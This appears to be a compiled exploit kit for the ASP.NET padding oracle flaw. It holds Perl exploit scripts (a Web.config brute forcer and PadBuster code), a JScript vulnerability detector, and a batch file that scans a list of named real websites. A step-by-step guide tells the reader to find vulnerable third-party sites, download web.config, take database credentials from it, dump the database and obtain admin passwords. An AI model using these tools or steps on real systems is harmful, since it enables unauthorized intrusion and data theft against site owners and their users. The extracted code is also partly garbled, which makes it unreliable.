    sub myEncode { my($toEncode, $format) = @_; return &encodeDecode($toEncode, 0, $format); } sub myDecode { my ($toDecode, $format) = @_; return &encodeDecode($toDecode, 1, $format); } sub encodeDecode { my ($toEncodeDecode, $oper, $format) = @_; # Oper: 0=Encode, 1=Decode # Format: 0=Base64, 1 Hex Lower, 2 Hex Upper, 3=NetUrlToken my $returnVal = ""; if ($format == 1 || $format == 2) { # HEX if ($oper == 1) { #Decode #Always convert to lower when decoding) $toEncodeDecode = lc($toEncodeDecode); $returnVal = pack("H*",$toEncodeDecode); } else { #Encode $returnVal = unpack("H*",$toEncodeDecode); if ($format == 2) {
  • 267.
    #Uppercase $returnVal = uc($returnVal) } } }elsif ($format == 3) { # NetUrlToken if ($oper == 1) { $returnVal = &web64Decode($toEncodeDecode,1); } else { $returnVal = &web64Encode($toEncodeDecode,1); } } elsif ($format == 4) { # Web64 if ($oper == 1) { $returnVal = &web64Decode($toEncodeDecode,0); } else { $returnVal = &web64Encode($toEncodeDecode,0); } } else { # B64 if ($oper == 1) { $returnVal = &decode_base64($toEncodeDecode); } else { $returnVal = &encode_base64($toEncodeDecode); $returnVal =~ s/(r|n)//g; }
  • 268.
    } return $returnVal; } sub web64Encode{ my ($input, $net) = @_; # net: 0=No Padding Number, 1=Padding (NetUrlToken) $input = &encode_base64($input); $input =~ s/(r|n)//g; $input =~ s/+/-/g; $input =~ s///_/g; my $count = $input =~ s/=//g; $count = 0 if ($count eq ""); $input.=$count if ($net == 1); return $input; } sub web64Decode { my ($input, $net) = @_; # net: 0=No Padding Number, 1=Padding (NetUrlToken) $input =~ s/-/+/g; $input =~ s/_///g; if ($net == 1) { my $count = chop($input);
  • 269.
    $input = $input.("="x int($count)); } return &decode_base64($input); } sub promptUser { my($prompt, $default, $yn) = @_; my $defaultValue = $default ? "[$default]" : ""; print "$prompt $defaultValue: "; chomp(my $input = <STDIN>); $input = $input ? $input : $default; if ($yn) { if ($input =~ /^y|n|a$/) { return $input; } else { &promptUser($prompt, $default, $yn); } } else { if ($input =~ /^-?d/ && $input > 0 && $input < 256) { return $input; } else { &promptUser($prompt, $default); } }
  • 270.
    } sub writeFile { my($fileName, $fileContent) = @_; if ($logFiles) { if ($dirExists != 1) { system($dirCmd." ".$dirName); $dirExists = 1; } $fileName = $dirName.$dirSlash.$fileName; open(my $OUTFILE, '>>', $fileName) or die "ERROR: Can't write to file $fileNamen"; print $OUTFILE $fileContent; close($OUTFILE); } } sub getTime { my ($format) = @_; my ($second, $minute, $hour, $day, $month, $year, $weekday, $dayofyear, $isDST) = localtime(time); my @months = ("JAN","FEB","MAR","APR","MAY","JUN","JUL","AUG","SEP","OCT","NOV","DEC"); my @days = ("SUN","MON","TUE","WED","THU","FRI","SAT"); $month=sprintf("%02d",$month); $day=sprintf("%02d",$day); $hour=sprintf("%02d",$hour); $minute=sprintf("%02d",$minute);
  • 271.
    $second=sprintf("%02d", $second); $year =~s/^.//; if ($format eq "F") { return $day.$months[$month].$year."-".( ($hour * 3600) + ($minute * 60) + ($second) ); } elsif ($format eq "S") { return $months[$month]." ".$day.", 20".$year." at ".$hour.":".$minute.":".$second; } else { return $hour.":".$minute.":".$second; } }  Web.config_bruter.pl #!/usr/bin/perl # # # Webconfig Bruter - exploit tool for downloading Web.config # # FOr use this script you need Pudbuster. # Padbuster is a great tool and Brian Holyfield deserve all the credits. # # # Giorgio Fedon - (giorgio.fedon@mindedsecurity.com) # use LWP::UserAgent; use strict; use Getopt::Std; use MIME::Base64; use URI::Escape; use Getopt::Long; #Definition of vars for .NET my $toEncodeDecode; my $b64Encoded; my $string; my $returnVal;
  • 272.
    my $testUrl; my $testBytes; my$sampleBytes; my $testUrl = @ARGV[0]."?d="; my $sampleBytes = @ARGV[1]; my $blockSize = @ARGV[2]; if ($#ARGV < 2) { die " Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize Where: URL = The target URL (and query string if applicable) EncryptedSample = The encrypted value you want to use. This need to come from Padbuster. BlockSize = The block size being used by the algorithm (8 or 16) Poc code by giorgio.fedon@mindedsecurity.com Original Padbuster code from Brian Holyfield - Gotham Digital Science Command Example: ./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16 ";} my $method = "GET"; $sampleBytes = encoder($sampleBytes, 1); my $testBytes = "x00" x $blockSize; my $counter = 0; # Use random bytes my @nums = (0..255); my $status = 1; while ($status) { # Fuzz the test bytes
  • 273.
    for (my $byteNum= $blockSize - 1; $byteNum >= 0; $byteNum--) { substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)])); } # Combine the test bytes and the sample my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0); chomp($combinedTestBytes); $combinedTestBytes =~ s/%0A//g; # Ok, now make the request my ($status, $content, $location, $contentLength) = makeRequest($method, $testUrl.$combinedTestBytes); if ($status == "200") { # Remove this for "T" exploit if (index($content,"parent.Sys.Application") == -1) { print $content."nn"; print "Total Requests:".$counter."nn"; print "Resulting Exploit Block:".$combinedTestBytes."nn"; last; } } $counter++; } # The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science # # I also did the encoder / decoder, but your logic is definitely better sub encoder { my ($toEncodeDecode, $oper) = @_; # UrlDecoder Encoder
  • 274.
    if ($oper ==1) { $toEncodeDecode =~ s/-/+/g; $toEncodeDecode =~ s/_///g; my $count = chop($toEncodeDecode); $toEncodeDecode = $toEncodeDecode.("=" x int($count)); $returnVal = decode_base64($toEncodeDecode); } else { $b64Encoded = encode_base64($toEncodeDecode); $b64Encoded =~ s/(r|n)//g; $b64Encoded =~ s/+/-/g; $b64Encoded =~ s///_/g; my $count = $b64Encoded =~ s/=//g; ($count eq "") ? ($count = 0) : ""; $returnVal = $b64Encoded.$count; } return $returnVal; } sub makeRequest { my ($method, $url) = @_; my ($lwp, $status, $content, $req, $location, $contentLength); # Setup LWP UserAgent $lwp = LWP::UserAgent->new(env_proxy => 1, keep_alive => 1, timeout => 30, requests_redirectable => [], ); $req = new HTTP::Request $method => $url; my $response = $lwp->request($req); # Extract the required attributes from the response $status = substr($response->status_line, 0, 3);
  • 275.
    $content = $response->content; #print$content; $location = $response->header("Location"); if ($location eq "") { $location = "N/A"; } $contentLength = $response->header("Content-Length"); return ($status, $content, $location, $contentLength); }  AspNetPaddingOracleDetector.js[ java Script ] /* ---------------------------------------- AspNetPaddingOracleDetector for ASP.NET ---------------------------------------- Duncan Smart, http://blog.dotsmart.net/ */ if (!WScript.FullName.match(/cscript.exe$/i)) { // Re-run in command prompt new ActiveXObject("WScript.Shell").Run('cmd.exe /c cscript.exe //E:JScript //nologo "'+ WScript.ScriptFullName +'" & pause') WScript.Quit(0); } var siteRoot; if (WScript.Arguments.Unnamed.Count != 1) { WScript.Echo("Enter site URL: ") siteRoot = WScript.StdIn.ReadLine() } else { siteRoot = WScript.Arguments.Unnamed.Item(0); } // Append root slash if neccessary if (!siteRoot.match("/$")) siteRoot += "/";
  • 276.
    WScript.Echo("Testing site: "+ siteRoot); //TODO: add more tests for other padding oracles var response1 = httpGet(siteRoot + "webresource.axd?aspxerrorpath=bar"); var response2 = httpGet(siteRoot + "webresource.axd?d=foo&aspxerrorpath=bar"); // Compare HTTP statuses if (response1.status != response2.status) { WScript.Echo("MIGHT BE VULNERABLE: HTTP status mismatch"); WScript.Echo("rn=== Response 1 ==="); WScript.Echo(response1.status); WScript.Echo("rn=== Response 2 ==="); WScript.Echo(response2.status); WScript.Quit(1); } // Compare headers if (response1.headers != response2.headers) { WScript.Echo("MIGHT BE VULNERABLE: HTTP headers mismatch"); WScript.Echo("rn=== Response 1 ==="); WScript.Echo(response1.headers); WScript.Echo("rn=== Response 2 ==="); WScript.Echo(response2.headers); WScript.Quit(1); } // Compare HTML if (response1.body != response2.body) { WScript.Echo("MIGHT BE VULNERABLE: HTTP body mismatch"); WScript.Echo("=== Response 1 ==="); WScript.Echo(response1.body); WScript.Echo(""); WScript.Echo("=== Response 2 ==="); WScript.Echo(response2.body); WScript.Quit(1); } WScript.Echo("Site might be OK: WebResource.axd is not acting as a padding oracle"); WScript.Quit(0);
  • 277.
    // ====== Utilities====== function httpGet(url) { var http = new ActiveXObject("Microsoft.XMLHTTP"); http.open("GET", url, /*async*/ false); try { http.send(); } catch (err) { return {'status':null, 'headers':null, 'body':null}; } var headers = http.getAllResponseHeaders().split(/rn/); // Remove "Date" header as that will likely be different! headers = filter(headers, function(h){ return !h.match("^Date:") }); return { status: http.status + " " + http.statusText, headers: headers.join("rn"), body: http.responseText }; } // Filters array to items that satisfy 'where' function function filter(array, where){ var newArray = []; for (var i = 0; i < array.length; i++) { if (where(array[i])) newArray.push(array[i]); } return newArray; }  ListSite.txt [ A blank file in which you write th website names ] Eg. http://moitruongsuckhoe.vn http://simpleway.vn http://sieuthi.xuctienthuongmai.vn http://footballonline.vn http://hdradio.vn http://domucgiare.com  CheckPaddingOracle.bat[A batch program for checking oracle vulnerability ]
  • 278.
    @echo off setLocal EnableDelayedExpansion for/f "tokens=* delims= " %%a in (ListSite.txt) do ( cscript //nologo AspNetPaddingOracleDetector.js %%a echo. ) cmd How To :  Go to any website " asp.net related ". Do reverse ip domain check and find the server and other sites.
  • 279.
     Copy allsites to notepad and name it as -: ListSite.txt  Run -: CheckPaddingOracle.bat Script it will check vulnerable website from list.
  • 280.
     Open Vunlerablesite and check its sourcecode for : /WebResource.axd?d= /ScriptResource.axd?d=
  • 281.
     Sanario IExtracted PaddingOracle.rar have folder that contain all scripts exe.bat, padBuster.pl, web.config_Bruter.pl now,  Open -: exe.bat & and run padBuster.pl  Command -: ..perl.exe padBuster.pl http://madeinvietnam.net/WebResource.axd?d=2uT3s0_S0xTW7_RW6mW1q2 2uT3s0_S0xTW7_RW6mW1q2 16 -encoding 3 -plaintext "|||~/web.config"
  • 282.
     Choose ID- 2  Now, you have Encrypted Value -: T-2QM86TZAAAAAAAAAAAAAAAAAAAAAA1  Now again construct a command like -: ..perl.exe Web.Config_Bruter.pl http://madeinvietnam.net/ScriptResource.axd - 2QM86TZAAAAAAAAAAAAAAAAAAAAAA1
  • 283.
     Copy thiscommand to exe.bat and run it.  You Will Get Resulting Exploit Block : gp05c15oqh4u3vIbDhFNU_tkD-GMAAAAAA0
  • 284.
     Create alink -: http://madeinvietnam.net/ScriptResource.axd?d= gp05c15oqh4u3vIbDhFNU_tkD-GMAAAAAA0  Open it in your web browser.  You will find one XML script now,  Find Kewword -: connection  In tht linke you will get Source address , UserID , Password  Now Open MS Sql and connect to database.
  • 285.
     Now wholedatabase is dumped into your pc or u can say I am connected to there databse now find admin tables & columns and open it up.  You can simply right click on adnin table > and select top 1000 rows
  • 286.
     OK youhave got your admin and its password now,  If Password is not encrypted then fine but like our case if password is encrypted then you have to inersept the password through Brup Suit " OR " If You can Decrypt your password its Awesome...  Open -: Brup Suit > proxy > intercept on
  • 287.
    PADBUSTER V0.3 ANDTHE .NET PADDING ORACLE ATTACK Now that a weekend has passed since the .NET patch was released, and since there is already a working public example of how to reliably download a web.config using the padding oracle attack, we have decided to finally releasev0.3 of PadBuster with the "Brute Force" option. This option is specifically designed to handle scenarios where the first block of ciphertext cannot be crafted using CBC-R due to a secret IV. This feature was NOT designed specifically for the .NET attack, as our intention for PadBuster is to be a universal tool for identifying and exploiting padding oracles in any web application. That being said, the brute force option CAN be used to reliably perform a web.config download attack within a reasonable number of requests. Before discussing how to perform this attack using PadBuster, and some of the other new features in this version, it's worth noting that there are more efficient ways to perform the web.config download attack using ScriptResource.axd. The T- Block brute force attack vector, which was originally pointed out to me by James Martin of ESP Technologies and is also discussed here by Giorgio Fedonof Minded Security, is significantly faster and more efficient. This technique, however, is pretty specific to the .NET ScriptResource.axd attack and as suchis not likely to be incorporated into PadBuster (a separate exploit script is probably warranted). The web.config attack using PadBuster is essentially a three step process. Iwill assume that the reader is already familiar with the specifics of why the script resource handler is vulnerable to a file download attack. If you are not familiar with the underlying issue, you can read about it here, here and here. Step 1: Encrypt the Payloadusing CBC-R The first step of the attack is to identify a component that is vulnerable to the padding oracle attack and use it to encrypt the web.config payload (|||~/web.config). This can typically be done in a few ways: 1 - Using WebResource.axd as a padding oracle for CBC-R.
  • 288.
    If CustomErrors areNOT enabled, then you don'teven need a valid ciphertext sample to exploit the oracle...you can use an encoded dummy value of all NULLS instead (AAAAAAAAAAAAAAAAAAAAAA2). padBuster.pl http://www.myapp.com/WebResource.axd?d=AAAAAAAAAAAAAAAAAAAA AA2 AAAAAAAAAAAAAAAAAAAAAA2 16 -encoding 3 -plaintext "|||~/web.config" If CustomErrors ARE enabled, you can still use WebResource.axd as the oracle. The caveat, however, is that you'll need to use a valid ciphertext query string sample and use the -prefix option so that PadBuster sends this sample as the prefix of each test request. padBuster.pl http://www.myapp.com/WebResource.axd?d=1s45vAJre3GVd98iQoAjgQ2 1s45vAJre3GVd98iQoAjgQ2 16 -encoding 3 -plaintext "|||~/web.config" -prefix 1s45vAJre3GVd98iQoAjgQ2 2 - Using ScriptResource.axd as a paddingoracle for CBC-R. Like with the web resource handler, this is pretty straightforward if CustomErrors are not enabled: padBuster.pl http://www.myapp.com/ScriptResource.axd?d=1s45vAJre3GVd98iQoAjgQ2 1s45vAJre3GVd98iQoAjgQ2 16 -encoding 3 -plaintext "|||~/web.config" If CustomErrors ARE enabled, this handler can also be used as a padding oracle. The interesting thing about this technique is that it seems to work despite implementing all of the workarounds that Microsoft recommended before the patch was issued (CustomErrors using RedirectMode and optional Sleep). This technique, however, requires use of the brute force option so I'll come back to that in a bit. Step 2: Verify the encrypted payload does NOT include pipes This step is optional, but certainly worth performing to ensure that you aren't headed down a dead end road. In order for the exploit to work, the payload you send to the handler (including the "garbage" IV block) CANNOT include any pipe characters. If it does, the payload will never work. To verify this, you can use the padding oracle to decrypt your payload and verify its contents. So assuming that Step 1 produced a payload value of
  • 289.
    "iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1", then the followingcommand would be used to verify the contents of the payload. Make sure to use the -noiv option as the first block is the one you are most interested in. padBuster.pl http://www.myapp.com/WebResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAA AAAA AAAAAAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 - encoding 3 -noiv So what if your payload DOES include pipes? Not to fear, there's an easy workaround for this too. You may have noticed that when you decrypt samples using PadBuster, it prints the HEX encoded Ciphertext Bytes and Intermediate Bytes with the results of each block. You can optionally use any of these pairs along with the -ciphertext and -intermediate switches to feed PadBuster a known pair of ciphertext/intermediate values for use during CBC-R encryption. Using any one of these pairs to encrypt your exploit payload should producea different payload than would otherwise be generated by PadBuster on its own, which can then be verified to ensure that it does not contain pipes. Step 3: Brute force the first block Now that you have a valid payload, the final step is to obtain the first block that will trigger the file download logic. The reason this step is tricky is that the Framework typically does not pass an IV along with the ciphertext. As such, we can't use the padding oracle to reliably produceour desired first block. The good news is that since you only need the first two bytes of the decrypted value to trigger our exploit (either Q#,q#,R#orr#) you can essentially brute force the needed block with fairly reliable success. And the even better news is that you’d be surprised at how quick it is to blindly brute force one of these values. The approachtaken by PadBuster is similar, but slightly different, than the approachused by Web.config Bruter script released by Giorgio Fedon. I must again credit James Martin for originally sharing his proofof conceptexploit code with me that leveraged this technique for identifying the first block. Instead of random block values, however, PadBuster performs a sequential brute force starting with all NULLS. The sequential brute force ensures that you never attempt the same block value more than once and also allows you to resume the brute force where you left off if the script gets killed (using the -resume option). The example shown below assumes the payload from our Step 2 example above:
  • 290.
    padBuster.pl http://www.myapp.com/ScriptResource.axd?d=iJBC6whziIIWQhKYX4KDpwAA AAAAAAAAA AAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 - encoding3 -bruteforce -log PadBuster's brute force mode works similar to the other modes of PadBuster, where the first step is an automated responseanalysis. The main difference is that rather than identifying a padding error, you want to identify an error that indicates failure of the brute force attempt rather than success. Inmost cases, you may have only one responseto choosefrom...which is totally fine (unless one of the initial 256 fuzzing attempts produces a different response). In the case of ScriptResource.axd, there’s a good chance you'll have more than one as shown below. INFO: Starting PadBuster Brute ForceMode [+] Starting responseanalysis... *** ResponseAnalysis Complete *** The following responsesignatures were returned: ------------------------------------------------------- ID# Freq Status Length Location ------------------------------------------------------- 1 1 200 337 N/A 2 ** 255 404 1524 N/A ------------------------------------------------------- Enter an ID that matches the error condition NOTE: The ID# marked with ** is recommended : The reason for the 200 responseincluded above is the T-Block. For our purposes, we are not using the T-Block so we can select signature #2 (the 404). PadBuster will continue issuing brute force attempts and notify you of every responsethat does not match this signature. You'll likely get several T-Block hits similar to the 200 responseshown above before you hit a block that returns the web.config as shown below (this is just an excerpt from the output) Attempt 4275 - Status: 200 - Content Length: 367 http://www.myapp.com/ScriptResource.axd?d=igA4AAAAAAAAAAAAAAAAA
  • 291.
    A8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0 Attempt 4561 -Status: 200 - Content Length: 360 http://www.myapp.com/ScriptResource.axd?d=4AA4AAAAAAAAAAAAAAAA AA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0 Attempt 4792 - Status: 200 - Content Length: 100277 http://www.myapp.com/ScriptResource.axd?d=xwA5AAAAAAAAAAAAAAAA AA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0 Attempt 5353 - Status: 200 - Content Length: 359 http://www.myapp.com/ScriptResource.axd?d=BAA6AAAAAAAAAAAAAAAA AA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0 As you can imagine, it’s difficult to tell whether these responses contain anything meaningful based solely on the data that is printed to the screen. In the caseof this exploit, we know that the web.config file is likely going to be much larger than the small T-Block responses which average around 500 Bytes. You can actually see that in the excerpt above, attempt number 4792 shows a much larger content length...this is the responsethat contains the web.config file. The inclusion of unwanted T-Block responses in our output is a result of our desire to maintain PadBuster as a universal toolthat is not specific to a particular vulnerability such as this one. You may also have noticed that our original command made use of another new option (-log). The "log" option tells PadBuster to log various output files in an automatically generated folder using the PadBuster.DDMMYY-TIME naming convention. This option is critical for use in brute force mode, since each matching responseis logged to this folder and can be easily reviewed to determine whether the brute force attempt worked. Forthe caseof a web.config download exploit, I recommend running the above command and monitoring the output folder to determine when a significantly larger responsefile gets created. Bypassing the Workarounds Now that you've seen how to retrieve the web.config, let’s go back to an alternate technique for using ScriptResource.axd as a padding oracle. As I mentioned previously, this technique works despite implementing therecommended workarounds initially presented by Microsoft in their guidance preceding the patch release. To start, you'll need a valid ciphertext sample. The sample, however, does
  • 292.
    not have tobe valid for the script resource handler (it can be taken from any Framework component...mosteasily from the WebResource.axd query string). Step 1: Find a valid T-Block Request Using the obtained sample, along with the -bruteforce option, the following command can be used to quickly brute force a valid T-Block. The following example assumes that we were able to obtain a valid "d" value from a link to the web resource handler (/WebResource.axd?d=qmZbysenet6VGS94Ord8gQ2&t=633768217780468750). padBuster.pl http://www.myapp.com/ScriptResource.axd?d=qmZbysenet6VGS94Ord8gQ2 qmZbysene t6VGS94Ord8gQ2 16 -encoding 3 -bruteforce Once you run PadBuster with these options, and select the default error pattern, you should get a 200 responsewithin the first few hundred requests similar to the one shown below: Attempt 60 - Status: 200 - Content Length: 337 http://www.myapp.com/ScriptResource.axd?d=OwAAAAAAAAAAAAAAAAA AAKpmW8rHp3relRkveDq3fIE1 Step 2: Use the obtained T-Block with the -prefix option Now you can leverage the obtained T-Block request, along with the -prefix option, to use the script resource handler as a padding oracle as shown below. padBuster.pl http://www.myapp.com/ScriptResource.axd?d=qmZbysenet6VGS94Ord8gQ2 qmZbysene t6VGS94Ord8gQ2 16 -encoding 3 -noiv -prefix OwAAAAAAAAAAAAAAAAAAAKpmW8rHp3relRkveDq3fIE1 The examples above hopefully demonstrate how to use the new features of PadBuster for performing various exploits against the .NET framework. Our plan is to add more features to PadBuster where they make sense, specifically features that can be useful in against a wide variety of padding oracle attack vectors. As always, send us your feedback, modifications, bug reports, or general comments so that we can incorporate them into future versions.